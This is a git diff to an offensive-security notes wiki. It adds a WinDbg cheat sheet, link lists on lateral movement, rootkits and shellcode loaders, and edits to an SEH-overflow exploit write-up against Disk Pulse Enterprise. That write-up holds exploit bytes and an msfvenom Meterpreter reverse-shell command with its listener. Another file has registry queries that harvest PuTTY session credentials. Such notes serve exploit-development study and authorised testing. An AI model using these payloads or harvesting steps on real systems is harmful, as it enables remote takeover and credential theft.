diff --git a/.gitbook/assets/avatar.png b/.gitbook/assets/avatar.png new file mode 100644 index 0000000..3b22ed4 Binary files /dev/null and b/.gitbook/assets/avatar.png differ diff --git a/SUMMARY.md b/SUMMARY.md index ac5331c..3422df5 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -213,6 +213,7 @@ - [OSCP BOF](expdev/bof/oscp-bof.md) - [OSED SEH Overflow](expdev/bof/osed-sehof.md) * [RE](expdev/re/README.md) +* [WinDbg](expdev/windbg.md) ## ⚙️ Admin diff --git a/expdev/bof/osed-sehof.md b/expdev/bof/osed-sehof.md index 3792309..f2a0907 100644 --- a/expdev/bof/osed-sehof.md +++ b/expdev/bof/osed-sehof.md @@ -150,7 +150,7 @@ send(buf) In case the bad characters cause the SEH overflow not happen at all, this command can help to speed up the debug routine: ``` -PS > Restart-Service "Vuln Service"; .\DbgX.Shell.exe -pn vulnsvc.exe -c 'g; !exchain'; sleep 3; python C:\sehof_bad_chars.py +PS > Restart-Service "Disk Pulse Enterprise"; .\DbgX.Shell.exe -pn diskpls.exe -c 'g; !exchain'; sleep 3; python C:\sehof_bad_chars.py ``` In case the bad characters are truncated from memory, dump the bytes (*EstablisherFrame* - the second argument of the vulnerable *ExecuteHandler*) and examine them manually or use [find-bad-chars.py](https://github.com/epi052/osed-scripts/blob/main/find-bad-chars.py) by [@epi052](https://twitter.com/epi052): @@ -173,7 +173,7 @@ Or ## 4. Search for P/P/R Sequence -P/P/R == `pop R32, pop R32, ret`: +P/P/R is `pop R32, pop R32, ret`: ``` $ msf-nasm_shell @@ -281,7 +281,7 @@ Search with [find-ppr.py](https://github.com/epi052/osed-scripts/blob/main/find- Break on the P/P/R and assemble a short jump over the *Next* structure exception handler: ``` -PS > Restart-Service "Vuln Service"; .\DbgX.Shell.exe -pn vulnsvc.exe -c 'g; bp 0x101576c0; g'; sleep 2; python C:\sehof_ppr.py +PS > Restart-Service "Disk Pulse Enterprise"; .\DbgX.Shell.exe -pn diskpls.exe -c 'g; bp 0x101576c0; g'; sleep 2; python C:\sehof_ppr.py Breakpoint 0 hit eax=00000000 ebx=00000000 ecx=101576c0 edx=77e06fa0 esi=00000000 edi=00000000 @@ -492,9 +492,12 @@ Evaluate expression: -14084 = ffffc8fc And then assemble an appropriate jump: -``` -jmp 0xffffc8fc -0: e9 f8 c8 ff ff jmp ffffc8fd <_main+0xffffc8fd> +```python +>>> from keystone import * +>>> ks = Ks(KS_ARCH_X86, KS_MODE_32) +>>> jump = [f'\\x{int(opcode):02x}' for opcode in ks.asm("jmp 0xffffc8fc;")[0]] +>>> print(f"""b'{''.join(jump)}'""") +("\xe9\xf7\xc8\xff\xff") ``` @@ -510,7 +513,7 @@ size = 6000 shellcode_size = 600 shellcode = b'\x90' * 20 -# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.13.37 LPORT=1337 EXITFUNC=thread -b "\x00\x09\x0a\x0d\x20" -e x86/shikata_ga_nai -f python -v shellcode +# msfvenom -p windows/meterpreter/reverse_tcp LHOST=eth0 LPORT=1337 EXITFUNC=thread -b "\x00\x09\x0a\x0d\x20" -e x86/shikata_ga_nai -f python -v shellcode # sudo msfconsole -qx 'use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST eth0; set LPORT 1337; set EXITFUNC thread; run' shellcode += b"" shellcode += b'C' * (shellcode_size - len(shellcode)) @@ -520,7 +523,7 @@ exp += LE(0x101576c0) # (PPR) pop eax; pop ebx; ret exp += b'\x90\x90' # (NSEH) offset for the 'eb 06' part of the jmp instruction #exp += b'\x66\x81\xc4\x52\x0f' # (Island Hop) add sp, 0xf50 #exp += b'\xff\xe4' # (Island Hop) jmp esp -exp += b'\xe9\xf8\xc8\xff\xff' # jmp 0xffffc8fc +exp += b'\xe9\xf7\xc8\xff\xff' # jmp 0xffffc8fc filler = b'A' * (2499 - 4) nop = b'\x90' * (size - len(filler + exp + shellcode)) diff --git a/expdev/windbg.md b/expdev/windbg.md new file mode 100644 index 0000000..7b262cf --- /dev/null +++ b/expdev/windbg.md @@ -0,0 +1,187 @@ +# WinDbg + + + + +## Install + +- [https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/](https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/) +- [https://github.com/TimMisiak/windup](https://github.com/TimMisiak/windup) + +Get the latest version (stolen from [here](https://stackoverflow.com/a/77062861/6253579)): + +```bash +wget --quiet --continue --no-check-certificate -O windbg.appinstaller https://aka.ms/windbg/download +grep -ioP "htt.*bundle" windbg.appinstaller > msix.txt +wget --quiet --continue --no-check-certificate -i msix.txt +7z.exe x windbg.msixbundle +7z.exe x *x64.msix -owindbgnew +cd windbgnew +start dbgx.shell.exe +``` + + + +### Symbols + +- [https://github.com/p0dalirius/pdbdownload](https://github.com/p0dalirius/pdbdownload) + + + + +## Cheatsheet + +Load debugging symbols: + +``` +> srv*c:\symbols*https://msdl.microsoft.com/download/symbols +> .reload /f +``` + +Unassemble from memory: + +``` +> u kernel32!GetCurrentThread +``` + +Read bytes from memory: + +``` +> db esp [L1] +> db 41414141 +> db kernel32!WriteFile + +> dw esp +> dd esp +> dq esp + +> dW/dc KERNELBASE+0x40 +``` + +Read data at a specified address: + +``` +> dd esp L1 +41414141 +> dd 41414141 +// The same as pointer to data +> dd poi(esp) +``` + +Dump structures: + +``` +> dt ntdll!_TEB +> dt -r ntdll!_TEB @$teb ThreadLocalStoragePointer +> dt -r ntdll!_TEB @$teb + +> ?? sizeof(ntdll!_TEB) +``` + +Edit bytes: + +``` +> dd esp L1 +> ed esp 41414141 +> dd esp L1 + +> da esp +> ea esp "AAAA" +> da esp +``` + +Search memory space: + +``` +> ed esp 41414141 +> s -d 0 L?80000000 41414141 + +> s -a 0 L?80000000 "This program cannot be run in DOS mode" +``` + +Work with registers: + +``` +> r +> r eax +> r eax=41414141 +``` + +Work with software breakpoints: + +``` +> bp kernel32!WriteFile +> bl +> bd 0 +> be 0 +> bc 0 +> bc * + +> lm m ole32 +> bu ole32!WriteStringStream +> bl +``` + +Breakpoints and actions: + +``` +BOOL WriteFile( + HANDLE hFile, + LPCVOID lpBuffer, + DWORD nNumberOfBytesToWrite, // Write to file "hello" -> "db esp+0x0c L1" is 04 (length of "hello", also in esi register) + LPDWORD lpNumberOfBytesWritten, + LPOVERLAPPED lpOverlapped +); + +> bp kernel32!WriteFile ".printf \"The number of bytes written is: %p\", poi(esp + 0x0C);.echo;g" +> bp kernel32!WriteFile ".if (poi(esp + 0x0C) != 4) {gc} .else {.printf \"The number of bytes written is 4\";.echo;}" +> bp kernel32!WriteFile ".if (@esi != 4) {gc} .else {.printf \"The number of bytes written is 4\";.echo;}" +``` + +Work with hardware breakpoints: + +``` +// Before: write "w00tw00t" to a file, save the file, close Notepad, re-open the file +> s -a 0x0 L?80000000 w00tw00t +> s -u 0x0 L?80000000 w00tw00t +> ba w 2 00b8b238 +> du +00b8b238 "a00tw00t" +``` + +![[Pasted image 20230924234241.png]] + +Step through code: + +``` +> p // step over +> t // step into +> pt // step to next return +> ph // execute code until a branching instruction is reached +``` + +List modules and symbols: + +``` +> .reload /f +> lm +> lm m kernel* +> x kernelbase!CreateProc* +``` + +Evaluation and output formats: + +``` +> ? ((41414141 - 414141) * 0n10) >> 8 +> ? 41414141 +> ? 0n41414141 +> ? 0y10101010 +> .formats 41414141 +``` + +Pseudo registers: + +``` +> r @$t0 = (41414141 - 414141) * 0n10 +> ? @$t0 >> 8 +``` diff --git a/pentest/infrastructure/ad/credential-harvesting/ssh-clients.md b/pentest/infrastructure/ad/credential-harvesting/ssh-clients.md index fc5b2ce..1c6b447 100644 --- a/pentest/infrastructure/ad/credential-harvesting/ssh-clients.md +++ b/pentest/infrastructure/ad/credential-harvesting/ssh-clients.md @@ -12,6 +12,7 @@ ``` Cmd > reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s Cmd > reg query "HKEY_USERS\\Software\SimonTatham\PuTTY\Sessions" /s +PS > Get-ChildItem -Path "HKCU:\Software\SimonTatham\PuTTY\Sessions\" -Recurse ``` diff --git a/pentest/infrastructure/ad/lateral-movement/rpc.md b/pentest/infrastructure/ad/lateral-movement/rpc.md index 0007a60..17e27da 100644 --- a/pentest/infrastructure/ad/lateral-movement/rpc.md +++ b/pentest/infrastructure/ad/lateral-movement/rpc.md @@ -197,3 +197,5 @@ namespace SharpSCExec - [[PDF] Unorthodox Lateral Movement (Riccardo Ancarani)](https://github.com/RiccardoAncarani/talks/blob/master/F-Secure/unorthodox-lateral-movement.pdf) - [https://github.com/netero1010/ScheduleRunner](https://github.com/netero1010/ScheduleRunner) - [https://github.com/netero1010/GhostTask](https://github.com/netero1010/GhostTask) +- [https://gist.github.com/Workingdaturah/991de2d176b4b8c8bafd29cc957e20c2](https://gist.github.com/Workingdaturah/991de2d176b4b8c8bafd29cc957e20c2) +- [https://github.com/dmcxblue/SharpGhostTask](https://github.com/dmcxblue/SharpGhostTask) diff --git a/pentest/infrastructure/ad/post-exploitation.md b/pentest/infrastructure/ad/post-exploitation.md index c67aa9c..fbb023f 100644 --- a/pentest/infrastructure/ad/post-exploitation.md +++ b/pentest/infrastructure/ad/post-exploitation.md @@ -167,6 +167,15 @@ PS > Disable-NetFirewallRule FPS-SMB-In-TCP* ``` +#### RpcShadow2 + +- [https://red.c3r3br4t3.com/red-team-operations/lateral-movement/shadowrdp](https://red.c3r3br4t3.com/red-team-operations/lateral-movement/shadowrdp) +- [https://github.com/c3r3br4t3/ShadowRDP](https://github.com/c3r3br4t3/ShadowRDP) +- [https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsts/4c6481f4-a1cc-4c76-abc1-3ece834e6451](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsts/4c6481f4-a1cc-4c76-abc1-3ece834e6451) +- [https://learn.microsoft.com/en-gb/windows/win32/api/rdpencomapi/nn-rdpencomapi-irdpsrapisharingsession](https://learn.microsoft.com/en-gb/windows/win32/api/rdpencomapi/nn-rdpencomapi-irdpsrapisharingsession) +- [http://www.rohitab.com/discuss/topic/41626-rdp-com-server-client/](http://www.rohitab.com/discuss/topic/41626-rdp-com-server-client/) + + ## Run on Domain Computers diff --git a/pentest/infrastructure/ad/privileges-abuse/seimpersonate/README.md b/pentest/infrastructure/ad/privileges-abuse/seimpersonate/README.md index 2d400b8..cb3a1c8 100644 --- a/pentest/infrastructure/ad/privileges-abuse/seimpersonate/README.md +++ b/pentest/infrastructure/ad/privileges-abuse/seimpersonate/README.md @@ -6,3 +6,12 @@ ## Restore Privileges * [https://itm4n.github.io/localservice-privileges/](https://itm4n.github.io/localservice-privileges/) + + + + +## Leaked Handles + +- [https://www.tarlogic.com/blog/token-handles-abuse/](https://www.tarlogic.com/blog/token-handles-abuse/) +- [https://github.com/blackarrowsec/Handly](https://github.com/blackarrowsec/Handly) +- [https://rastamouse.me/safehandle-vs-intptr/](https://rastamouse.me/safehandle-vs-intptr/) diff --git a/pentest/infrastructure/ad/token-manipulation.md b/pentest/infrastructure/ad/token-manipulation.md index 346edfe..530a800 100644 --- a/pentest/infrastructure/ad/token-manipulation.md +++ b/pentest/infrastructure/ad/token-manipulation.md @@ -7,6 +7,8 @@ - [https://xret2pwn.github.io//Building-Token-Vault-Part0x02/](https://xret2pwn.github.io//Building-Token-Vault-Part0x02/) - [https://rastamouse.me/token-impersonation-in-csharp/](https://rastamouse.me/token-impersonation-in-csharp/) - [https://xakep.ru/2022/12/06/win-api-secrets/](https://xakep.ru/2022/12/06/win-api-secrets/) +- [https://ardent101.github.io/posts/tokens_theory/](https://ardent101.github.io/posts/tokens_theory/) +- [https://habr.com/ru/articles/776298/](https://habr.com/ru/articles/776298/) - [[PDF] Technical Analysis of Access Token Theft and Manipulation (McAfee)](https://www.mcafee.com/enterprise/en-us/assets/reports/rp-access-token-theft-manipulation-attacks.pdf) ![Access Token Theft and Manipulation (McAfee)](/.gitbook/assets/011.png) diff --git a/pentest/infrastructure/networks/README.md b/pentest/infrastructure/networks/README.md index c284a84..367e0b1 100644 --- a/pentest/infrastructure/networks/README.md +++ b/pentest/infrastructure/networks/README.md @@ -1,4 +1,4 @@ -# Network +# Networks - [https://github.com/frostbits-security/MITM-cheatsheet](https://github.com/frostbits-security/MITM-cheatsheet) - [https://xakep.ru/2021/08/25/stp-yersinia/](https://xakep.ru/2021/08/25/stp-yersinia/) @@ -8,3 +8,12 @@ {% embed url="https://youtu.be/JdeE4TQ3OsM" %} {% embed url="https://www.youtube.com/live/a-S_Sg2gyXo?feature=share" %} + + + + +## NAT Hole Punching + +- [https://habr.com/ru/articles/763164/](https://habr.com/ru/articles/763164/) +- [https://github.com/dwoz/python-nat-hole-punching](https://github.com/dwoz/python-nat-hole-punching) +- [https://github.com/penumbra23/peerko](https://github.com/penumbra23/peerko) diff --git a/pentest/infrastructure/persistence.md b/pentest/infrastructure/persistence.md index f8ce46d..eb28a8d 100644 --- a/pentest/infrastructure/persistence.md +++ b/pentest/infrastructure/persistence.md @@ -273,3 +273,4 @@ $ pkill gs-bd ### Rootkits * [0x00sec.org/t/kernel-rootkits-getting-your-hands-dirty/1485](https://0x00sec.org/t/kernel-rootkits-getting-your-hands-dirty/1485) +* [https://github.com/eeriedusk/nysm](https://github.com/eeriedusk/nysm) diff --git a/pentest/infrastructure/post-exploitation.md b/pentest/infrastructure/post-exploitation.md index d9f7804..e05b538 100644 --- a/pentest/infrastructure/post-exploitation.md +++ b/pentest/infrastructure/post-exploitation.md @@ -11,6 +11,7 @@ description: General Post Exploitation - [https://github.com/blendin/3snake](https://github.com/blendin/3snake) - [https://github.com/hackerschoice/ssh-key-backdoor](https://github.com/hackerschoice/ssh-key-backdoor) +- [https://github.com/MegaManSec/SSH-Snake](https://github.com/MegaManSec/SSH-Snake) Search SSH logs for connection source IPs: diff --git a/redteam/maldev/code-injection/README.md b/redteam/maldev/code-injection/README.md index 273f6b4..a66f4ba 100644 --- a/redteam/maldev/code-injection/README.md +++ b/redteam/maldev/code-injection/README.md @@ -331,6 +331,8 @@ int main(int argc, char** argv) - [https://www.r-tec.net/r-tec-blog-process-injection-avoiding-kernel-triggered-memory-scans.html](https://www.r-tec.net/r-tec-blog-process-injection-avoiding-kernel-triggered-memory-scans.html) - [https://github.com/S3cur3Th1sSh1t/Caro-Kann](https://github.com/S3cur3Th1sSh1t/Caro-Kann) +- [https://caueb.com/attackdefense/threadlessstompingkann/](https://caueb.com/attackdefense/threadlessstompingkann/) +- [https://github.com/caueb/ThreadlessStompingKann](https://github.com/caueb/ThreadlessStompingKann) @@ -421,12 +423,27 @@ VerifierEnumerateResource ## PE to Shellcode -- [https://github.com/monoxgas/sRDI](https://github.com/monoxgas/sRDI) -- [https://github.com/TheWover/donut](https://github.com/TheWover/donut) - [https://github.com/hasherezade/pe_to_shellcode](https://github.com/hasherezade/pe_to_shellcode) - [https://bruteratel.com/research/feature-update/2021/01/30/OBJEXEC/](https://bruteratel.com/research/feature-update/2021/01/30/OBJEXEC/) - [https://github.com/paranoidninja/PIC-Get-Privileges](https://github.com/paranoidninja/PIC-Get-Privileges) + + +### sRDI + +- [https://github.com/monoxgas/sRDI](https://github.com/monoxgas/sRDI) + + + +### Donut + +- [https://thewover.github.io/Introducing-Donut/](https://thewover.github.io/Introducing-Donut/) +- [https://thewover.github.io/Cruller/](https://thewover.github.io/Cruller/) +- [https://github.com/TheWover/donut](https://github.com/TheWover/donut) +- [https://github.com/S4ntiagoP/donut/tree/syscalls](https://github.com/S4ntiagoP/donut/tree/syscalls) +- [https://github.com/Binject/go-donut](https://github.com/Binject/go-donut) +- [https://github.com/listinvest/undonut]https://github.com/listinvest/undonut() + [Example](https://github.com/l4ckyguy/ukn0w/commit/0823f51d01790ef53aa9406f99b6a75dfff7f146) with [SharpHound.exe](https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.exe) and donut (C# cross-compilation is done with [Mono](https://www.mono-project.com/download/stable/)): {% code title="sweetblood.sh" %} @@ -481,6 +498,14 @@ This technique is enhanced and automated [here](https://gist.github.com/snovvcra +### CLRvoyance + +- [https://github.com/Accenture/CLRvoyance](https://github.com/Accenture/CLRvoyance) +- [https://github.com/kyleavery/ThirdEye](https://github.com/kyleavery/ThirdEye) +- [https://web.archive.org/web/20230601160135/https://www.accenture.com/us-en/blogs/cyber-defense/clrvoyance-loading-managed-code-into-unmanaged-processes](https://web.archive.org/web/20230601160135/https://www.accenture.com/us-en/blogs/cyber-defense/clrvoyance-loading-managed-code-into-unmanaged-processes) + + + ## PE Injection